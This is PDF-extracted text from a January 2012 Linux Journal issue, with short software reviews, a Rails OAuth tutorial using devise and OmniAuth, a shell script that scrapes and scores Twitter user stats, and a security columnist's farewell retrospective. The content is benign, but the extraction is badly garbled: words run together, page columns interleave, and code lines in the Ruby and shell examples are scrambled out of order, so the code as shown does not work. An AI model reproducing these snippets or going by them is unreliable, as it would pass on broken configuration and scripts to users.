includes tools fororganizing and navigating the script,as well as tools for managing revisionsand rewrites.Fade In intelligently handles thevarious formatting elements of ascreenplay. You can format the elementsmanually using key combinations ormenus, or you can format everythingjust by using the Enter and Tab keys.Type a Scene Heading and press Enter,and the next element automatically isformatted as Action. Press Tab to changethe formatting to Character, whichautomatically is followed by Dialogue.Press Tab to change from Dialogue toParenthetical, which formats properlyand inserts the parentheses.Fade In builds autocomplete lists ofyour characters and locations. Onceyou’ve written a character or location, youcan re-enter it with a couple keystrokes.When it’s time to produce a screenplay,Fade In can help by generating standardproduction reports including scenes,cast, locations and so on. You then canprint these reports or save themto HTML or CSV.Fade In can import and export filesin these formats: Final Draft, FormattedText, Screenplay Markdown, Unformatted26 / JANUARY 2012 / WWW.LINUXJOURNAL.COM

[ UPFRONT ]Text and XML. It also can import files inCeltx or Rich Text Format and export toPDF and HTML. The Final Draft formatis particularly important if you want tosell your script or submit it to certainscreenplay-writing contests.Fade In is not free. According to theWeb site, the regular price is $99.95,although at the time of this writing, youcan get it for $49.95. Either way, it’s muchcheaper than $249 for Final Draft. Youcan download the demo and try it first,then buy it if the software works for you.There also are versions of Fade In formobile devices: Android, iPhone and iPad.You can download the Linux versionas a DEB, RPM or tar.gz file in either32-bit or 64-bit versions.Check it out at http://www.fadeinpro.com.—CHARLES OLSENWWW.LINUXJOURNAL.COM / JANUARY 2012 / 27

[ UPFRONT ]You Need A Budget(Image from: www.youneedabudget.com)This time of year is often rough on finances,and although there are many moneymanagementtools available for Linux, noneare quite like You Need A Budget, or YNABfor short. Unlike traditional budgetingprograms, YNAB focuses on a few simplerules to help you get out of debt and,more important, to see where your moneyis going. If you’ve ever struggled withsticking to a budget (I certainly have), giveYNAB a try. I’m not a “numbers person”,yet YNAB seems to make sense.YNAB is an Adobe Air-based application,so it runs on Windows, Macintosh andLinux. It’s not free, but there’s a sevendaytrial and a 30-day money-backguarantee. There’s even an app in theAndroid Marketplace that will sync withyour desktop application for enteringpurchases on the go. YNAB isn’t foreveryone, but if you’ve ever struggledwith budgeting and been frustratedthat most finance applications areWindows-only, give YNAB a try:http://www.youneedabudget.com.—SHAWN POWERS28 / JANUARY 2012 / WWW.LINUXJOURNAL.COM

[ UPFRONT ]Casper, the Friendly(and Persistent) GhostCreating a live Linux USB stick isn’tanything new. And, in fact, the abilityto have persistence with a live CD/USB stick isn’t terribly new. Whatmany people might not be aware of,however, is just how easy it is to makea bootable USB stick that you can uselike a regular Linux install. Using the“Startup Disk Creator” in any of theUbuntu derivatives, creating a bootableUSB drive with persistence is as simpleas dragging a slider to determine howmuch space to reserve for persistence!The concept of persistence has comea long way too. The casper filesystembasically overlays the live USB session, soyou actually can install programs in yourlive session and have those programsremain installed the next time you boot.The same is true with files you mightcreate and store in your home directory aswell. If you’ve ever liked the concept of alive USB, but felt limited by the default setof applications, persistence is for you. Infact, with a sizable USB stick and a littlemore work, you can make a multibootUSB stick with persistence as well.—SHAWN POWERSEMBEDDEDSERVER• Fanless x86 500MHz/1GHz CPU• 512MB/1GB DDR2 RAM On Board• 4GB Compact Flash Disk• 10/100 Base-T Ethernet• Reliable (No CPU Fan or Disk Drive)• Two RS-232 Ports2.6 KERNEL• Four USB 2.0 Ports• Audio In / Out• Dimensions: 4.9 x 4.7 x 1.7” (125 x 120 x 44mm)Standard SIB(Server-In-a-Box)Starting at $305Quantity 1.Since 1985• Power Supply Included• Locked Compact Flash Access• Analog SVGA 3D Video• Optional Wireless LAN• EMAC Linux 2.6 Kernel• Free Eclipse IDEOVER25YEARS OFSINGLE BOARDSOLUTIONSEQUIPMENT MONITOR AND CONTROLPhone: (618) 529-4525 · Fax: (618) 457-0110 · Web: www.emacinc.comWWW.LINUXJOURNAL.COM / JANUARY 2012 / 29

COLUMNSAT THE FORGEWorkingwith OAuthREUVEN M.LERNERWant your users to be able to log in via Facebook, Twitteror Google+? OAuth is the answer!Like many software developers (andpeople in general), I’m something ofa hypocrite. When I’m working withclients, I tell them how important it isto have secure passwords, how theyshould use a different password on everysite, and how they should force theirusers to have secure passwords as well.And although I often do use differentpasswords for different sites and try tochange them on a semi-regular basis,the fact is that I can remember only somany different ones and end up reusinga number of them in different variationsand at different times. Better (or worse)yet, I don’t need to remember thesepasswords, because my browser can andoften will do it for me.Now, this clearly is a problem, becauseit means if others crack one of my reusedpasswords, they might (depending on thepassword in question) be able to accessa number of other systems around theworld, from sites where I shop to serversI help operate.Passwords have other problemsassociated with them as well. When youregister with a Web site, how do youknow that you can trust the site withyour identity? Do you really want tocreate another account? You’ve alreadyregistered with many different sitesthrough the years. Why not just use oneof those logins to authenticate yoursession at another site? (Of course, youcould argue that there’s no reason to trustcertain sites, such as Facebook, but that’sanother discussion entirely.)This idea, that you shouldn’t needto register with new sites and insteadshould be able use your existingregistration information from othersites, has gained popularity in the lastfew years. A protocol known as OAuthmakes it possible to put this into effect,letting any site be a “consumer” (thatis, use another site’s authenticationcredentials) or a “provider” (that is,make its user-registration informationavailable to other applications). This30 / JANUARY 2012 / WWW.LINUXJOURNAL.COM

COLUMNSAT THE FORGEOAuth is platform-neutral, meaning youcan use it from any language you like.means that although people normallymight use OAuth to log in via Twitteror Facebook, there’s no reason whyyour own applications could not beproviders as well. OAuth itself is silenton this matter, allowing each consumerapplication to decide which providers itwill and won’t allow.This column focuses on Web applications,so I’m not going to discuss the OAuthprotocol itself. For that, I suggestreading the appropriately named “APrimer to the OAuth Protocol” by AdrianHannah in the June 2011 issue of LJ(see Resources).A number of alternatives have beenproposed through the years, but noneof them really have taken off. Oneof the more intriguing suggestions,OpenID, is something I covered severalyears ago in this column, and I’d stilllike to see it succeed, but as a speakermentioned at a conference I recentlyattended, OpenID was neither clear norappealing to anyone outside the softwaredevelopment community.This article shows how to includeOAuth in your own applications. OAuthis platform-neutral, meaning you canuse it from any language you like. Asregular readers of this column know,I’m a big fan of the Ruby language andthe Ruby on Rails framework for Webdevelopment, so I demonstrate OAuth inthat way here. Implementations for manyother languages and frameworks exist aswell, so if you’re not a Ruby developer,consider looking for the appropriatelibrary for your favorite language.OAuth BasicsAs I mentioned previously, I’m notgoing to describe the OAuth protocolin detail. Rather, I want to describehow it works from the perspective of aWeb application.First and foremost, you need to decidewhich providers you are interested inusing and then register with each ofthem. Different applications will wantto use different providers. For example,GitHub, a commercial service that hostsGit repositories, supports OAuth. Ifyour users are likely to have GitHubaccounts, it might be worthwhile to haveit as a provider. But, if you’re creating aconsumer shopping application, the oddsare pretty good that most of your userswon’t have GitHub accounts. Thus, youalso should consider another provider,such as Facebook or Twitter.Registering with a provider givesyou a unique ID and a secret, whichyou can think of as a user name andWWW.LINUXJOURNAL.COM / JANUARY 2012 / 31

COLUMNSAT THE FORGEpassword for your application. Thesewill allow your application to connectto the provider.When users want to authenticate toyour non-OAuth site, they typically haveto enter a user name and password. Butif your system uses OAuth, the user nameand password (or any other system) ishandled by the provider, rather than bythe consumer (that is, your application).So long as the provider agrees that you’rewho you say you are, your applicationwill accept that claim.The authentication process beginswhen users indicate they want to login via a third-party provider. Users areredirected to a URL on the provider’s site,where users are asked to authenticate.In some cases, this can happen in onestep, passing the application’s ID; in othercases, it requires two HTTP transactions:one to get a request token and a secondto perform the actual authentication.Regardless, the result of authenticationis an HTTP request from the provider toyour application. That request will includeseveral additional parameters, including acode generated by the provider.Finally, your application must make a callto the provider, combining everything youhave used so far—the application’s uniqueID for this provider, the secret and the codeyou got from the provider after the user’sauthentication. If all goes well, the serverwill respond by requesting your URL again,indicating (via passed parameters) that youhave authenticated this user.Actually, one additional piece ofinformation is handed to the OAuthprovider, namely the “scope”, whichyou can think of as a set of permissions.Many providers offer different amounts ofinformation about a person. For example,Facebook could provide you with my nameand e-mail address, information about myfriends or even the ability to read my chatand inbox messages.Not all users will want to allow yourapplication the full set of Facebookpermissions. A good general rule ofthumb is that you should ask for theminimum set of permissions from theprovider that will allow your applicationto work. If your application works onyour Facebook inbox, it obviously willneed permission to work with the inbox.If not, there’s no reason to grant itsuch permission. The permissions yourequest in the “scope” parameter willbe displayed to the user as part of theauthentication dialog, such that he orshe will not be surprised by the degreeto which the consumer application canaccess private data.Setting Up DeviseIf the above flow seems a bit complicated,that’s because it is. Instead of a simpleHTML form that is submitted to acontroller on your own server, you’renow having a conversation with aremote server that requires three or fourdifferent HTTP transactions, each withits own set of parameters. But, it’s pretty32 / JANUARY 2012 / WWW.LINUXJOURNAL.COM

COLUMNSAT THE FORGEclear to me that for all of its complexityand added overhead, OAuth is a goodway to go for many Web sites.Fortunately, as is often the case withopen-source software and networkstandards, freely available libraries makethe integration of such functionality fairlyeasy. For example, let’s assume I wantto create a “hello, world” application.Anonymous users get a plain-old “hello,world”, but registered users get a premiumversion of “hello, world”, so there’s a bigincentive for people to register and sign in.I have been using the devise libraryfor user registration and authenticationfor some time now, and I’ve found it tobe quite easy to use as well as flexible.I’m not the only one who has found itto be flexible though. A large number ofplugin modules are available for devise,making it possible to change the wayauthentication is done. One of theseplugins is called (somewhat confusingly)OmniAuth, which makes it possible toauthenticate against a variety of sites andprotocols, including OAuth.At the shell prompt, I first createdthree databases in PostgreSQL:createdb helloworld_developmentcreatedb helloworld_testcreatedb helloworld_productionI then created a simple applicationusing PostgreSQL:rails new helloworld -d postgresqlNext, I modified the Gemfile suchthat it would use devise, by adding thefollowing line:gem 'devise'Then, I invoked:bundle installto ensure that the Ruby gem wasinstalled in my application. Next, Iinstalled devise into my application:rails g devise:installWith that in place, I created a new“user” model, using the generator thatcomes with devise:rails g devise userI then created a new route, so that Ican get to the home controller:root :to => 'home#index'Realizing I didn’t yet have a homecontroller, I then added it:rails g controller homeNext, I removed public/index.html toensure that it doesn’t take over frommy application.Then, I made a slight change tothe database configuration fileWWW.LINUXJOURNAL.COM / JANUARY 2012 / 33

COLUMNSAT THE FORGEBecause I’m using devise, I can add a beforefilter to any controller that forces users to login if they haven’t done so already.(config/database.yml). I created thedatabase as the “reuven” user, whichdoesn’t require a password on my localmachine, but Rails (reasonably) assumesthat I want to have a unique databaseuser for this application. So I modifiedconfig/database.yml, such that the“user name” provided was changed to“reuven”. I was able to test that databaseaccess worked correctly by using theshortcut to enter the psql database client:rails db -pWith all of that in place, I ran themigrations:with OAuth. But if you’ve been doingRails development for any length of time,this shouldn’t faze you too much, asmuch of it becomes second nature.Adding AuthenticationNow that I have a basic workingapplication, I’m going to force peopleto log in. Because I’m using devise, Ican add a before filter to any controllerthat forces users to log in if theyhaven’t done so already. I just add thefollowing inside the controller’s classesfor people to be signed in:before_filter :authenticate_user!bundle exec rake db:migrateThat created my user model inthe database.Next, I modified app/views/hello/index.html.erb, such that it gives aquick “Hello” response to anyone whoinvokes it and added the followingroute in config/routes.rb:match '/hello' => 'hello#index'I realize that this seems like an awfullylong set of steps just so you can playI put this line at the beginning of theclass definition of HelloController. Andsure enough, the next time I went to / onmy server, I got a registration form.So far, so good, but say you don’twant to have a devise registration form.Rather, you want people to sign in via athird-party application. For now, let’s sayyou want people to log in via Facebook.How do you accomplish that?Well, the first thing you need to dois ensure that you’re on a “real” URL,on a publicly available server. It’s niceto develop on your own local computer,34 / JANUARY 2012 / WWW.LINUXJOURNAL.COM

COLUMNSAT THE FORGEI added a line here for Facebook:config.omniauth :facebook, '149179328516589','XXXXXX59862dede3791430ffXXXXXXXX',:scope => 'user_about_me,user_education_history,read_friendlists'Notice how the scope is Facebookdependent;each provider can set itsown list of scopes, according to whatinformation it has to offer.Finally, you need to modify yourapplication such that when the userwants to log in, you go to Facebook,rather than to the default registrationand login forms. For this to work,you need at least one page withoutauthentication enabled. (As a generalrule, you don’t want to authenticateevery page on a system—after all, usersshould be able to see the home pagewithout logging in, right?)Thus, I changed the before_filter inHelloController to read:before_filter :authenticate_user!, :except => :indexIn other words, users need to beauthenticated except for your home(default) page, index. I also added anew route to config/routes.rb:match '/goodbye' => 'hello#goodbye'This means that your “hello”controller responds to a second action,named “goodbye”. And, according tothe rules you have established, userswho want to see “goodbye” need tolog in. Sure enough, after putting inthese changes, going to /hello results ina “hello!” being displayed, without anyneed to register or log in. But, goingto /goodbye redirects you to the deviselogin form.Now that users can come to your homepage without being logged in, you canprovide them with the option to log in,either using your regular registrationsystem or via Facebook. The easiest wayI’ve found to do this is to modify thedefault layout for the application, inapp/views/layouts/application.html.erb. Iadded the following: • •or In other words, users now cansign up (register) with your localregistration system or log in directlyusing their Facebook accounts. Theuser_omniauth_authorize_path(:facebook) helper was createdautomatically by devise when youdefined your model as :omniauthable.This is why, by the way, you canhave only a single model defined as:omniauthable in devise. It normallyisn’t an issue, although I have seensystems in which there were twodifferent login schemes, one for regularusers and one for administrators.36 / JANUARY 2012 / WWW.LINUXJOURNAL.COM

COLUMNSAT THE FORGEIf the user decides to log in as usual,nothing changes. But if the user clickson “sign in with Facebook”, the wholeOAuth system kicks into gear, whichmeans that if you’re testing yoursoftware on a computer or server that’snot identical to what you told Facebook,you’ll receive an error indicating that theredirection URL didn’t work correctly.When I clicked on the “sign inwith Facebook” link, my browserwas redirected to a Facebook pagewhich told me, very simply, that the“helloworld” application would like toget information about me and aboutmy education. This reflected at leastpart of the scope that I had definedback in devise.rb::scope => 'user_about_me,user_education_history,read_friendlists'But, what about reading my list offriends? Did Facebook somehow forget?Not exactly. After signing in on thatinitial page, Facebook then gave mea new page, indicating that:Devise::OmniauthCallbacksControllerThis is because I still need to do twothings. First, I need to update my route,such that the Facebook callback willbe handled by devise. I can do this bymodifying config/routes.rb, such that theoriginal route:devise_for :useris replaced by:devise_for :user, :controllers => {}:omniauth_callbacks => "users/omniauth_callbacks"This means that when Omniauth isinvoked for a callback, I want theusers/omniauth_callbacks controller totake care of this. The second thing Imust do is define this controller, byputting omniauth_callbacks.rb insideof app/controllers/users, a subdirectorythat I must create. I took the definitionof this controller straight from thedevise documentation:To enhance your experience, helloworld would alsolike permission to:class Users::OmniauthCallbacksController "Facebook"WWW.LINUXJOURNAL.COM / JANUARY 2012 / 37

COLUMNSAT THE FORGEendendsign_in_and_redirect @user, :event => :authenticationelseendsession["devise.facebook_data"] = env["omniauth.auth"]redirect_to new_user_registration_urlIn other words, I want to find a userin my database based on the FacebookOAuth information I got back. If I alreadyhave such a user in the system, then Isign in as that user. Otherwise, I ask theperson to register as a new user.But of course (and yes, this is thelast step), I need to define the methodUser.find_for_facebook_oauth.Again, the devise documentation offersa solution, in that you can define thisclass method as follows (with somemodifications from the original):def self.find_for_facebook_oauth(access_token,➥signed_in_resource=nil)data = access_token['extra']['raw_info']Facebook, you’re thus taken to the URLfrom your OAuth handler, and...well, onmy system, I get an error, indicating thatmy new User instance was not created inthe database, because I violated one ormore of the validations on my Rails Usermodel. Which ones? The e-mail addressand password cannot be blank.How can this be? Well, you can seethat if the user does not exist, thenyou try to create it with the e-mailaddress that you got from Facebook,stored in the “data” hash that thismethod creates:u = User.new(:email => data["email"])u.password = Devise.friendly_token[0,20]u.save!In order to better understand this,I added the following line to thefind_for_facebook_oauth method,just after defining the “data” hash:logger.warn data.to_yamlif user = User.find_by_email(data["email"])userelse # Create a user with a stub password.u = User.new(:email => data["email"])u.password = Devise.friendly_token[0,20]u.save!uAnd sure enough, when I tried tolog in via Facebook again, I got a lotof information about myself in thecontroller, but not my e-mail address.That’s because the scope that I defined inconfig/initializers/devise.rb didn’t include“email”. You can update that definition:endend:scope => 'email,user_about_me,user_education_history,read_friendlists'When you try to log in again viaThen you have to restart the server38 / JANUARY 2012 / WWW.LINUXJOURNAL.COM

COLUMNSWORK THE SHELLMore TwitterUser StatsDAVE TAYLORCan a formula quantify whether someone is worth followingon Twitter? Dave tackles this complex subject with a niftyshell script and some math.In my last article, I started a script thatidentified user stats for Twitter accounts,with the intention of being able toanalyze those stats and come up with anengagement or popularity score. Yeah, it’skind of like Klout, but without the privacyimplications or cross-platform sniffing.The motivation behind creating thescript is to have a tool that lets youquickly differentiate between Twitterusers who are spammers or bots andthose who are influencers—for example,users who have more followers thanpeople they ostensibly follow.With surprisingly little work, I createda short script snippet that extracted basicTwitter figures: followers, following, numberof tweets and the number of Twitter liststhat include the Twitter account in question:stats="$(curl -s $twitterurl/$username |➥grep -E '(stats_count|stat_count)'➥| sed 's/]*>/ /g;s/,//g')"echo $statsThe problem is, I ran out of spaceafter realizing that some accounts werepresented in one format while otherswere in another, as shown in these twodiffering results:$ sh tstats.sh gofatherhood3 0 0 0 Tweets$ sh tstats.sh filmbuzz#side .stats a:hover span.stats_count #side .stats a➥span.stats_count 1698 4664 301 13258 TweetsThat’s not good, so let’s start by fixing it.Filters Rely on Low-Level Page FormatThe problem, of course, is that mycomplicated grep sequence relies on thepage being formatted in a very specificmanner. If Twitter changes it even theslightest bit, things might well requireupdates and tweaks. Next time, we’lljust get a supercomputer and some AI.For now though, I’ll make the—rash—assumption that I’ve found both possible40 / JANUARY 2012 / WWW.LINUXJOURNAL.COM

COLUMNSWORK THE SHELLThe problem, of course, is that my complicatedgrep sequence relies on the page beingformatted in a very specific manner.output formats between @FilmBuzzand my new @GoFatherhood Twitteraccounts (the former tied to my filmblog, http://www.DaveOnFilm.com,and the latter tied to my new dad bloghttp://www.GoFatherhood.com, incase you’re curious).To normalize the output, I simply canfilter out the “.stats” line:twitterurl="http://twitter.com"if [ $# -ne 1 ] ; thenfiecho "Usage: $0 TWITTERID"exit 1username="$1"# no trailing slashstats="$(curl -s $twitterurl/$username | grep -E➥'(stats_count|stat_count)' |echo $statssed 's/]*>/ /g;s/,//g' | grep -v '.stats')"The result is exactly as desired now:$ sh tstats.sh filmbuzz1698 4664 301 13259 TweetsThe next logical step is to identify eachof those fields, so we can do some basiccalculations and screening.With a set of numbers separated byspaces, there are a couple ways to pullthem into variables, but my favorite is touse sed to turn the set of values into aname=value sequence, as illustrated inthis simple example:eval $(echo 1 2 3 | sed 's/^/a=/;s/ /;b=/;s/ /;c')The intermediate output of this isa=1;b=2;c=3, and when it’s evaluatedby the shell (the eval and the $()subshell working together), the result isthat there are now three new variables inthe shell, a, b and c, with the values 1, 2and 3, respectively:$ echo b = $bb = 2To apply this in our Twitter script, I’lljust make the smallest tweaks:eval $(echo $stats | cut -d\ -f1-4 |➥sed 's/^/fwing=/;s/ /;fwers=/;s/➥/;lists=/;s/ /;tweets=/')echo "$1 has sent $tweets tweets and follows $fwing,has $fwers followers and is on $lists lists."Note that I had to add a cut invocationto get rid of the word “Tweets” (see theWWW.LINUXJOURNAL.COM / JANUARY 2012 / 41

COLUMNSWORK THE SHELLearlier script output) to ensure that evaldoesn’t get confused with its variableassignments. The result is nice:filmbuzz has sent 13259 tweets and follows 1698,has 4664 followers and is on 301 lists.Trying a different user?davetaylor has sent 30282 tweets and follows 567,http: sequence and so forth, but I’llleave that as an exercise for you, thereader, and look forward to someonesubmitting the improved code to ourarchives at Linux Journal.For now, I’m going to posit that aninteresting tweet value can be calculatedlike this:has 10284 followers and is on 791 lists.Good. Now let’s talk numbers.Lightweight Numbers, LightweightResultsBefore I proceed, yes, I realize that theonly outcome we can have from tryingto analyze these most basic of stats isgoing to be a very simplistic score ofwhether someone is “interesting” orhas any authority in the Twitterverse.Useful additional stats would be howmany times they’re re-tweeted (othersrebroadcast their messages), whatpercentage of their tweets include aURL (which can indicate whether they’resimply disseminating Web contentor actually participating on Twitter)and what percentage of their tweetsreference another Twitter account or,ideally, are actually replies to otherTwitter users.We could calculate some of thesefigures by pulling the 100 mostrecenttweets from an account andquickly scanning for the @ symbol, an(followers / following) * (lists/1000) * (tweets/1000)It’s not perfect. Indeed, my friendF. Andy Seidl points out that 100/10 isn’tnecessarily only half as influential as200/10 and suggests we use logarithms,but let’s work with this basic calculationfirst and see what we get.For my @DaveTaylor account, here’s thebase math:(10284 / 567) * (793/1000) * (30285/1000)which solves down to 434. Bycomparison, @FilmBuzz with a muchcloser ratio of followers to followingsolves down to the value 11, and thebrand-new, zero value @GoFatherhoodsolves—unsurprisingly—to zero.Robert Scoble of Rackspace is aninteresting case to examine here. Hisstats: scobleizer has sent 56,157 tweetsand follows 32,527, has 21,6782 followersand is on 19,134 lists. Impressive. Hisscore? 7,161.One more example before we implement42 / JANUARY 2012 / WWW.LINUXJOURNAL.COM

COLUMNSWORK THE SHELLthe formula: @linuxjournal has sent3,208 tweets and follows 5,050, has12,050 followers and is on 1,165 lists.Score: 9.Suffice it to say, it’s a weak analysissystem. Still, it’s at least something toexplore and, as I suggested earlier, thereare lots of ways to refine and improvethe formula once you can extractindividual data points easily from theTwitter stream.$ sh tstats.sh davetaylordavetaylor: 30285 tweets sent, follows 567, has 10283 followers,is on 793 lists. SCORE: 433.60$ sh tstats.sh linuxjournallinuxjournal: 3208 tweets sent, follows 5050, has 12050 followers,is on 1165 lists. SCORE: 8.83$ sh tstats.sh arringtonCoding the ScoreMath is most commonly implementedusing the bc program, and since we havenicely named variables, it’s a breeze toimplement in the script:echo "scale=2;($fwers / $fwing) * ($lists/1000) * ($tweets/1000)" | bcFully implementing it with somefriendly output involves a slight tweakof the earlier echo statement coupledwith the use of the /bin/echo versionof the command that knows the -n(no line break at the end) version. You’llsee why:/bin/echo -n "$1: $tweets tweets sent, follows $fwing, has $fwers➥followers, is on $lists lists. SCORE: "arrington: 9163 tweets sent, follows 1852, has 100477 followers,is on 7729 lists. SCORE: 3836.29It’s not unreasonable that MikeArrington, with 100,477 followersagainst the 1,852 that he follows shouldhave a high Twitter influence score, whileLinux Journal, with its 12,050 followersagainst the 5,050 it’s following isostensibly less popular or influential.Anyway, I’ve run out of space here.I hope this has been interesting, and Ihighly encourage you to push on thisidea and see both what additionalnumbers you can glean from Twitter andhow they can all be combined into asingle numeric score that could offer upa Twitter score.■echo "scale=2;($fwers / $fwing) * ($lists/1000) * ($tweets/1000)" | bcWith this in hand, a few quick testcalculations:Dave Taylor has been hacking shell scripts for more than 30 years.Really. He’s the author of the popular Wicked Cool Shell Scriptsand can be found on Twitter as @DaveTaylor and more generallyat http://www.DaveTaylorOnline.com.WWW.LINUXJOURNAL.COM / JANUARY 2012 / 43

COLUMNSPARANOID PENGUINfide experts and all-around alpha geeksprovided palpable incentives for gettingthings right! But I must say, as much asI used to worry about being exposed asa charlatan by some angry sysadmin oranother, that day never came. I’ve beensubject to plenty of criticism and errorcorrectionduring the years, but 99% ofit has been constructive and kind, forwhich I’ve been abidingly grateful.)That first year, I also wrote a couplemore-generalized pieces, “Designingand Using DMZ Networks to ProtectInternet Servers” (March 2001,http://www.linuxjournal.com/article/4415) and “Practical Threat Analysisand Risk Management” (January 2002,http://www.linuxjournal.com/article/5567). These were both piecesthat involved skills I had exercised regularlyin my day-to-day work as a securityconsultant, and they gave (I hope) somecontext to the tools I was tutorializing.This was the pattern I tried to maintainthrough the subsequent decade: carefullyresearched and tested technical tutorials,interspersed now and then with higherlevelsecurity background.Reviews and InterviewsThe higher-level articles consistedof more than just me ranting aboutwhat I think constitutes good security.Sometimes, I let other hackers do theranting, in candid interviews: Weld Pond(Chris Wysopal) in the September 2002issue (http://www.linuxjournal.com/article/6126); Richard Thieme in December2004 (http://www.linuxjournal.com/article/7934); Marcus Meissner in October2008 (http://www.linuxjournal.com/article/10183); Anthony Lineberry in August2009 (http://www.linuxjournal.com/article/10505); and most recently,“Ninja G” in March and April 2011(http://www.linuxjournal.com/article/10970 and http://www.linuxjournal.com/article/10996).The Richard Thieme and Ninja Ginterviews were especially fun for me towrite, because in both cases the entireexercise amounted to replicating in printexactly the type of private conversationsI’ve enjoyed with Richard and G throughthe years at DEF CON and elsewhere.And sure enough, they each rose to theoccasion, displaying in their own waysnot only technological brilliance, but alsofascinating opinions and stories aboutmany other things besides, includingHomeland Security, hacking as quest fortruth, ninjutsu and nautical martial arts.Besides interviewing hackercelebrities, I also wrote a coupleproduct reviews: BestCrypt in June2002 (http://www.linuxjournal.com/article/5938) and Richard Thieme’sbook Islands in the Clickstream in March2005 (http://www.linuxjournal.com/article/7935). You may wonder, why so46 / JANUARY 2012 / WWW.LINUXJOURNAL.COM

COLUMNSPARANOID PENGUINfew reviews, given what an excellent waythis is to obtain free products?First, I can recall attempting at leasttwo other evaluations: one was of someWLAN (802.11b) host adaptors thatwere supposedly Linux-compatible, andthe other was of a miniature embeddedcomputer platform that supposedly wasoptimized for Linux. In both cases, Ifailed to get the evaluation hardwareworking properly. Because “it doesn’twork” falls rather short of the 2,500-word submission quota I usually had tomeet, I chose different topics for thosetwo months’ columns.Four attempted reviews (two successful)in 11 years isn’t a very high rate, I admit.The other reason I didn’t attempt more ofthem was philosophical. It seemed thatit was more immediately useful for me tostick mainly to writing tutorials of popular,free software tools, than to evaluatecommercial products that in many caseswere redundant with such tools.Which isn’t to say I was or am againstcommercial software. For example, bycovering the free (GPL) version of theZorp firewall in March and April 2004(http://www.linuxjournal.com/article/7296 and http://www.linuxjournal.com/article/7347), I indirectly gave a minorboost to the commercial Zorp Pro, which(at that time, at least) was configuredin a very similar way. Rather, I chose tofocus mainly on free software, becauseI could and because it felt good tosupport developers to whom I felt Iowed something.Supposedly Fun Things I NeverDid AgainSome ubiquitous tools, like BIND andiptables, I covered more than oncethrough the years. With others, I mayhave written about them only once inLinux Journal, but revisited them in furtherdepth when I wrote the book BuildingSecure Servers With Linux in 2002, andits second edition, retitled Linux ServerSecurity in 2005. (Like many of myarticles, I’ve been pleasantly surprised athow much of Linux Server Security is stillrelevant. But the main reason I mentionthe book here is that it grew directly outof my Paranoid Penguin columns!)Other tools, however, I was happyto abandon shortly after figuring outhow to operate them properly. In onecase, the tool itself wasn’t bad; theunderlying protocol, of which the toolwas simply an implementation, was andis hopelessly convoluted.I’m going to indulge myself in a littlecoyness and not name these tools I foundexcuses to abandon. Just because I don’tenjoy using something doesn’t mean I’mnot grateful to those who donated theirtime and talent to develop it.What I’m really trying to say is thatcomplexity-fatigue is still one of Linux’sWWW.LINUXJOURNAL.COM / JANUARY 2012 / 47

COLUMNSPARANOID PENGUINbiggest ongoing challenges. Evenhackers sometimes are overwhelmedby how complicated it can be to geta single piece of software runningproperly under Linux. By “complexity”,I don’t just mean “requiring theuse of a command prompt”. On thecontrary, I have an abiding fondnessfor applications that pull all theirconfiguration information from a singletext file, rather than scattering settingsacross multiple files (or worse, in abinary data file that can be modifiedonly by some GUI tool).Have you ever noticed that one ofthe highest forms of praise we giveLinux distributions and applications is“it just works”? This, in my opinion,is a big reason Ubuntu has been sosuccessful. An almost unprecedentedpercentage of things in Ubuntu“just work”. This speaks not only toUbuntu’s stability and sensible defaultsettings, but also to how easy it is toconfigure it properly.I don’t value simplicity just becauseI’m mentally lazy (which I totallyadmit to being). Complexity is theenemy of security. It makes it harderto spot configuration errors, it leadsto unforeseen dependencies andinteractions, and it incites otherwiseupstandingand industrious systemadministrators to take shortcuts theywouldn’t ordinarily contemplate.Recurring ThemesWhich, if you’ve been reading thecolumn a while, probably is somethingyou’ve read here before. Across all thesedifferent applications and technologiesI’ve researched, tested and written about,I’ve seen a number of recurring themesand commonalities.First, the key to securing anything,be it a single application or anentire operating system, is to disableunnecessary functionality and toleverage available (and relevant)security capabilities fully.Second, the worst way to use any Linuxtool is to succumb to the notion that onlyroot can do anything useful. The morethings running as root on your system,the more things an attacker might beable to abuse in a way that leads tototal system compromise. Therefore, it’simportant to run processes under lessprivilegedaccounts or to use SELinux orAppArmor to curb root’s omnipotence.Third, firewalls are neither dead,irrelevant nor obsolete. With so muchof our network use focused on thebrowser, and with mainstream firewalls(including Linux’s Netfilter/iptables) havingmade little progress overall in gainingapplication visibility and intelligence,firewalls certainly are less helpful thanthey were 11 years ago. But this doesn’tmean we can live without firewalls. It justmeans we need to find additional controls48 / JANUARY 2012 / WWW.LINUXJOURNAL.COM

COLUMNSPARANOID PENGUIN(application gateways/proxies, encryptiontools and so forth) to pick up the slack.Fourth, we’re still suffering froma general lack of security controls inprotocols on which the Internet relies.SMTP, DNS and even IP itself werecreated long ago, at a time whencomputer networks were exotic and rare.Even TLS/SSL, whose sole purpose is toadd security to Web transactions, wasdesigned with a very primitive and limitedtrust model that has not stood up verywell against man-in-the-middle attacks oragainst Certificate Authority breaches.Securing these old protocols, likesecuring Linux itself, usually amounts toimplementing new security features (SMTPSTARTTLS, DNSSEC and so forth) that haveentered the mainstream only recently.On a related note, in January 2010, I wrotea column titled “Linux Security Challenges2010” (http://www.linuxjournal.com/article/10647). I’m both pleased anddepressed by how much of it stillseems relevant, nearly two years later.Suffice it to say that virtualization,cloud computing, man-in-the-middleattacks against TLS/SSL and targetedmalware have, collectively, made itthat much more imperative to do thehard work of securing our systems andapplications, and to find new ways bothto implement “least-privilege” securitymodels and to make it easier to runapplications securely.ConclusionSo here I am, 11 years after I started,paranoid about nearly all the samethings I was paranoid about when Ibegan, just more so. Am I worried? Notreally. On the contrary, I’m comfortedknowing that so many things both badand good about how we understandsecurity to work appear to be more orless constant. This doesn’t get us offthe hook for keeping current with newattacks and new technologies. It does,however, mean that what we knewyesterday will make it easier for us tolearn what we need to know tomorrow,in order to operate securely.Thank you, Jill Franklin, CarlieFairchild and my other dear friends atLinux Journal, and especially to you,my engaged, inquisitive and altogetherremarkable readers, for accompanyingme on this 11-year journey and formaking it possible for me to learn somuch in such a public way. I don’tknow when I’ll be writing about Linuxsecurity again, but I know that it willbe here.I hope that in the meantime, youremain safe!■Mick Bauer is Principal Security Architect for a health insurancecompany in Minnesota. He’s the best player of the uilleann (Irish)pipes on his block, a passable maker of candlesticks, flutes andother long round wooden objects, and is the extremely proudfather of four implausibly fabulous daughters.WWW.LINUXJOURNAL.COM / JANUARY 2012 / 49

